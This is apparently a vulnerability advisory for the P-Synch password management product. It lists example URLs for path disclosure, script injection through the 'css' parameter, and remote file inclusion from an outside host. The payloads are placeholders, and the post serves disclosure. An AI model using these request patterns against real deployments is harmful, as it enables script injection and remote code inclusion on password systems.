Multiple Vulnerabilities In P-Synch Password Management ------------------------------------------------------- The other night I came across a server running P-Synch. I had never heard of it so i was curious to poke around on it a bit. Within an hour i found the vulns listed below. Im pretty sure there are other more serious vulns in P-Synch, but they are very picky about who they give thier software to, even an evaluation version. So was not able to test any further. However i encourage any admins running P-Synch to poke around on it, just to be on the safe side. Description ------------------------------------------------------- P-Synch Total Password Management Solution by M-TECH P-Synch is a total password management solution. It is intended to reduce the cost of ownership of password systems, and simultaneously improve the security of password protected systems. This is done through: -Password Synchronization. -Enforcing an enterprise wide password strength policy. -Allowing authenticated users to reset their own forgotten passwords and enable their locked out accounts. -Streamlining help desk call resolution for password resets. P-Synch is available for both internal use, on the corporate Intranet, as well as for the Internet deployment in B2B and B2C applications. Problems ------------------------------------------------------- All of these problems are simple, self explanatory vulns so, i'm sure the below examples will speak for themselves. Once again this application was NOT thoroughly researced. So anyone with a copy of P-Synch might wanna explore it further. Path Disclosure Vulnerability ------------------------------------------------------- https://path/to/psynch/nph-psa.exe?lang= https://path/to/psynch/nph-psf.exe?lang= Code Injection Vulnerability ------------------------------------------------------- https://path/to/psynch/nph-psf.exe?css=">[VBScript, JScript etc] https://path/to/psynch/nph-psa.exe?css=">[VBScript, JScript etc] File Include Vulnerability ------------------------------------------------------- https://path/to/psynch/nph-psf.exe?css=http://somesite/file https://path/to/psynch/nph-psa.exe?css=http://somesite/file Credits ------------------------------------------------------- All credits go to JeiAr of GulfTech Computers and CSA Security Research